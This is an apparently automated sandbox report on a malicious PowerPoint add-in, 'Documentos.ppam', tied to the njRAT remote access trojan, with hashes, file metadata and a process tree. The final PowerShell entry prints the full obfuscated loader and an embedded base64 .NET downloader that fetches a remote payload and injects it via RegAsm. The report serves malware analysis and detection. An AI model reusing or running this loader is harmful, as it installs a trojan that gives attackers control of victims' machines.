File name: | Documentos.ppam |
Full analysis: | https://app.any.run/tasks/3c2b04eb-08ac-4081-addf-6b9683e0322d |
Verdict: | Malicious activity |
Threats: | njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world. |
Analysis date: | June 28, 2022, 09:55:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.presentationml.presentation |
File info: | Microsoft PowerPoint 2007+ |
MD5: | 1A5AB39ECF526A79B4CD098A1D16DE82 |
SHA1: | 5AA7E093A288028C6FE433EC7F679D93651FA218 |
SHA256: | 38F04E48C23DBA3596D1773C81CCA0ABD21A4CAEB635D079ED3EFCDAE193C1BD |
SSDEEP: | 768:VPRFtKPxrf6KCNFESpyN72d4AXhbGc2oPGxzP8IRizg6hX+e0iX/:VJHKdeESpyR+RbTPKE7gLe5P |
.ppam | | | PowerPoint Macro-enabled Open XML add-in (65.8) |
---|---|---|
.zip | | | Open Packaging Conventions container (27.7) |
.zip | | | ZIP compressed archive (6.3) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0xf9ba2dfc |
ZipCompressedSize: | 268 |
ZipUncompressedSize: | 488 |
ZipFileName: | [Content_Types].xml |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1912 | "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\AppData\Local\Temp\Documentos.ppam" | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Explorer.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft PowerPoint Version: 14.0.6009.1000 Modules
| |||||||||||||||
1332 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\bFvBy.vbs" | C:\Windows\System32\WScript.exe | POWERPNT.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
2448 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JцшеBGцшеHcцшеaQBlцшеHEцшеIцшецше9цшеCцшецшеJwцшеlцшеEkцшеRgBVцшеE0цшеTgцшеlцшеCcцшеOwцшеkцшеEIцшеRQBpцшеHMцшеQQцшеgцшеD0цшеIцшецшеnцшеCUцшеYQBCцшеGQцшеSQBwцшеCUцшеJwцше7цшеFsцшеQgB5цшеHQцшеZQBbцшеF0цшеXQцшеgцшеCQцшеeцшеBEцшеEoцшеbwBBцшеCцшецшеPQцшеgцшеFsцшеUwB5цшеHMцшеdцшеBlцшеG0цшеLgBDцшеG8цшеbgB2цшеGUцшеcgB0цшеF0цшеOgцше6цшеEYцшеcgBvцшеG0цшеQgBhцшеHMцшеZQцше2цшеDQцшеUwB0цшеHIцшеaQBuцшеGcцшеKцшецшеgцшеCQцшеRgB3цшеGkцшеZQBxцшеCцшецшеKQцше7цшеFsцшеUwB5цшеHMцшеdцшеBlцшеG0цшеLgBBцшеHцшецшеcцшеBEцшеG8цшеbQBhцшеGkцшеbgBdцшеDoцшеOgBDцшеHUцшеcgByцшеGUцшеbgB0цшеEQцшеbwBtцшеGEцшеaQBuцшеC4цшеTцшеBvцшеGEцшеZцшецшеoцшеCцшецшеJцшеB4цшеEQцшеSgBvцшеEEцшеIцшецшеpцшеC4цшеRwBlцшеHQцшеVцшеB5цшеHцшецшеZQцшеoцшеCcцшеQwBsцшеGEцшеcwBzцшеEwцшеaQBiцшеHIцшеYQByцшеHkцшеMwцшеuцшеEMцшеbцшеBhцшеHMцшеcwцшеxцшеCcцшеKQцшеuцшеEcцшеZQB0цшеE0цшеZQB0цшеGgцшеbwBkцшеCgцшеJwBSцшеHUцшеbgцшеnцшеCkцшеLgBJцшеG4цшеdgBvцшеGsцшеZQцшеoцшеCQцшеbgB1цшеGwцшеbцшецшеsцшеCцшецшеWwBvцшеGIцшеagBlцшеGMцшеdцшеBbцшеF0цшеXQцшеgцшеCgцшеJwBUцшеFgцшеTQBGцшеDkцшеdцшеBCцшеFQцшеLwB3цшеGEцшеcgцшеvцшеG0цшеbwBjцшеC4цшеbgBpцшеGIцшеZQB0цшеHMцшеYQBwцшеC8цшеLwцше6цшеHMцшеcцшеB0цшеHQцшеaцшецшеnцшеCwцшеIцшецшеnцшеFQцшеcgB1цшеGUцшеJwцшеsцшеCцшецшеJwBGцшеEsцшеWgBWцшеFgцшеJwцшеsцшеCцшецшеJwBUцшеHIцшеdQBlцшеCcцшеLцшецшеgцшеCQцшеQgBFцшеGkцшеcwBBцшеCцшецшеKQцшеpцшецше==';$uDFil = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('цше','A') ) ).replace('%aBdIp%', 'C:\Users\admin\AppData\Local\Temp\bFvBy.vbs' ).replace('%IFUMN%','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AENvbnRleHRWYWx1ZWAxAFRocmVhZFNhZmVPYmplY3RQcm92aWRlcmAxAENsYXNzMQBDbGFzc0xpYnJhcnkzAGdldF9VVEY4ADxNb2R1bGU+AFQAREZXb1kARGlzcG9zZV9fSW5zdGFuY2VfXwBDcmVhdGVfX0luc3RhbmNlX18AUHJvamVjdERhdGEAbXNjb3JsaWIATWljcm9zb2Z0LlZpc3VhbEJhc2ljAExvYWQAU3luY2hyb25pemVkAEdldE1ldGhvZABSZXBsYWNlAENyZWF0ZUluc3RhbmNlAGdldF9HZXRJbnN0YW5jZQBkZWZhdWx0SW5zdGFuY2UAaW5zdGFuY2UAR2V0SGFzaENvZGUASW52b2tlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAEFwcFdpblN0eWxlAFNlY3VyaXR5UHJvdG9jb2xUeXBlAEdldFR5cGUAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAcmVzb3VyY2VDdWx0dXJlAE1ldGhvZEJhc2UAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAFN0clJldmVyc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBIZWxwS2V5d29yZEF0dHJpYnV0ZQBHZW5lcmF0ZWRDb2RlQXR0cmlidXRlAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBEZWJ1Z2dlckhpZGRlbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUASnNLdmUAc2V0X0VuY29kaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcARnJvbUJhc2U2NFN0cmluZwBEb3dubG9hZFN0cmluZwBUb1N0cmluZwBHZXRGb2xkZXJQYXRoAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABTaGVsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AVG9Cb29sZWFuAFN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24AQXBwRG9tYWluAGdldF9DdXJyZW50RG9tYWluAGdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBSdW4ATWV0aG9kSW5mbwBDdWx0dXJlSW5mbwBLdGlwbwBUQURjcgBtX0FwcE9iamVjdFByb3ZpZGVyAG1fVXNlck9iamVjdFByb3ZpZGVyAG1fQ29tcHV0ZXJPYmplY3RQcm92aWRlcgBtX015V2ViU2VydmljZXNPYmplY3RQcm92aWRlcgBTcGVjaWFsRm9sZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAQ29udmVyc2lvbnMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQARW52aXJvbm1lbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAaVFNQnUAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAT2MAbQBkAC4AZQB4AGUAIAAvAGMAIABwAGkAbgBnACAAMQAyADcALgAwAC4AMAAuADEAIAAtAG4AIAA1ACAAJgAgAGMAbwBwAHkAIAAiAAEHIgAgACIAAANcAAALLgB2AGIAcwAiAABNYwBtAGQALgBlAHgAZQAgAC8AYwAgAHAAaQBuAGcAIAAxADIANwAuADAALgAwAC4AMQAgAC0AbgAgADcAIAAmACAAZABlAGwAIAAiAAEDIgAAQ1AAQQBiADUAZgB0ADcAMgAvAHcAYQByAC8AbQBvAGMALgBuAGkAYgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoAAAFAyYDJgEDQQAARUMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsAABdcAHYANAAuADAALgAzADAAMwAxADkAAClDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4AQwBsAGEAcwBzADEAAAdSAHUAbgAAF1wAUgBlAGcAQQBzAG0ALgBlAHgAZQAAAAAAzI9aL6rCbEyiG4fNrFFp4AAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFBByAEAQ4ODg4GFRIoARIMBhUSKAESCAYVEigBEmEGFRIoARIkBCAAEwAFAAICHBwHAAESaRGAjQUgABKAkQcgAgEOEoCRCAABEoCVEoCVCgcGDg4ODg4SgIkEAAECDgYAAQ4RgKUFAAEOHQ4JAAQIDhGArQIIBgADDg4ODgYAAQERgLUFAAASgL0GIAEBEoC9BAABDg4EIAEODgUgAg4ODgUAAg4ODgUAABKAxQUAAR0FDgcgARKAkR0FBSABEmkOBiABEoDNDgYgAhwcHRwGAAEBEoCJAwAAAQQAARwcBCABAhwDIAAIAyAADgQHAR4AAh4ABRABAB4ABAoBHgAEBwETAAYVEigBEwAHBhUSbQETAAYVEm0BEwACEwAECgETAAUgAQETAAi3elxWGTTgiQiwP19/EdUKOgcGFRIoARIMBwYVEigBEggHBhUSKAESYQcGFRIoARIkAwYSfQQGEoCBAwYSGAQAABIMBAAAEggEAAASYQQAABIkBAAAEn0FAAASgIEGAAEBEoCBBAAAEhgIAAUBDg4ODg4EIAASaQcQAQEeAB4ABzABAQEQHgAECAASDAQIABIIBAgAEmEECAASJAQIABJ9BQgAEoCBBAgAEhgEKAATAAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAFAQAAAAApAQAkRTMxRjJDRDYtMEIzQi00M0RELUI2NzAtNzEwOUYwQzcwMzNDAAAMAQAHMS4wLjAuMAAASQEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC41AQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRIuTkVUIEZyYW1ld29yayA0LjUEAQAAAAgBAAEAAAAAABgBAApNeVRlbXBsYXRlCDExLjAuMC4wAABBAQAzU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyCDE2LjAuMC4wAABZAQBLTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5FZGl0b3JzLlNldHRpbmdzRGVzaWduZXIuU2V0dGluZ3NTaW5nbGVGaWxlR2VuZXJhdG9yCDE2LjIuMC4wAABhAQA0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXwAAABABAAtNeS5Db21wdXRlcgAAEwEADk15LkFwcGxpY2F0aW9uAAAMAQAHTXkuVXNlcgAAEwEADk15LldlYlNlcnZpY2VzAAAQAQALTXkuU2V0dGluZ3MAAAAAtAAAAM7K774BAAAAkQAAAGxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlUmVhZGVyLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkjU3lzdGVtLlJlc291cmNlcy5SdW50aW1lUmVzb3VyY2VTZXQCAAAAAAAAAAAAAABQQURQQURQtAAAAAAAAABEiyueAAAAAAIAAAB5AAAAPDwAADweAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAUlNEU0y66M9q/RZPhVvqU+tFgs0BAAAAQzpcVXNlcnNccGpvYW9cRGVza3RvcFxVcENyeVxNZXRvZG8gREZcQ2xhc3NMaWJyYXJ5M1xDbGFzc0xpYnJhcnkzXG9ialxSZWxlYXNlXENsYXNzTGlicmFyeTMucGRiAN08AAAAAAAAAAAAAPc8AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADpPAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAA7AIAAAAAAAAAAAAA7AI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBEwCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAACgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBuAHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAAAqAAEAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAAAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4AMAAAAEQAEgABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMwAuAGQAbABsAAAAJgABAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAAAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAATAASAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBkAGwAbAAAACIAAQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAwAAAAMPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=');powershell.exe -Command $uDFil | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | |||||||||||
